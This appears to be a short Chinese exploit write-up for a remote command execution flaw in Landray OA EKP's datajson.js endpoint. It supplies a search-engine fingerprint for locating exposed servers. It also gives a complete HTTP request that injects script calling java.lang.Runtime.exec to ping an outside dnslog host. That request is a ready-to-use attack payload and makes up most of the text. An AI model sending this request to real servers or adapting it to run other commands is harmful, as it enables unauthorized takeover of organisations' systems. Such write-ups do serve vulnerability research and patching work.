蓝凌OA EKP datajson存在远程命令执行漏洞
一、漏洞简介
蓝凌OA EKP,是蓝凌旗下的协同办公平台,其定位在平台型产品,它是结合蓝凌知识管理及移动互联网理念设计,综合企业管理支撑系统发展而来,并将协同办公、知识共享、文化管理、战略管理等融合为一体,通过企业门户统一战线,满足用户个性化办公要求的一体化工作平台。蓝凌OA EKP datajson存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。
二、漏洞简介
- 蓝凌OA EKP
三、资产测绘
- hunter
app.name="Landray 蓝凌OA"
- 特征
四、漏洞复现
GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%205vfzyo.dnslog.cn%22)&type=1 HTTP/1.1
Host:
Pragma: no-cache
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache